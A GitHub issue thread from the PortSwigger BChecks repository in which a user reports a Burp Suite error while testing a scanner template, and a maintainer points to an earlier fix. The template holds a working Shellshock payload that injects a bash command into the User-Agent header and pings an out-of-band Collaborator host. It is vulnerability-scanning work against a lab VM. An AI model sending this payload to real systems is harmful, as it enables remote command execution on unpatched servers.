search

PortSwigger / BChecks

BChecks collection for Burp Suite Professional and Burp Suite Enterprise Edition
https://portswigger.net/burp/documentation/scanner/bchecks
GNU Lesser General Public License v3.0
606 stars 107 forks source link

Unexpected error. #19

Closed fullspectrumdev closed 1 year ago

fullspectrumdev commented 1 year ago

So I am getting a rather unusual error while trying to test out a bcheck based on some of the templates here.

Process-monitoring the vulnerable VM, the ping command does get ran correctly, but something in Burp is deeply dissatisfied with things and chucks out an error.

Using the vulnerable VM from here: https://pentesterlab.com/exercises/cve-2014-6271/attachments

Screenshot 2023-06-30 at 13 11 24

Template code:

metadata:
    language: v1-beta
    name: "Request-level collaborator based Shellshock"
    description: "Shellshock in headers with out-of-band detection"
    author: "fsd"

define:
    shellshock = `() \{ :;}; /bin/bash -c 'ping -c 1 {generate_collaborator_address()}'`

given request then
    send request:
        replacing headers:
              "User-Agent": `{shellshock}`

    if dns interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "shellshock in user-agent header."
            remediation: "lol, update bash."
    end if

Update: It now, for whatever reason, seems to work fine. I did nothing but tried again after a while.

A-J-C commented 1 year ago

This sounds like the same bug that was fixed with out latest release: https://github.com/PortSwigger/BChecks/issues/16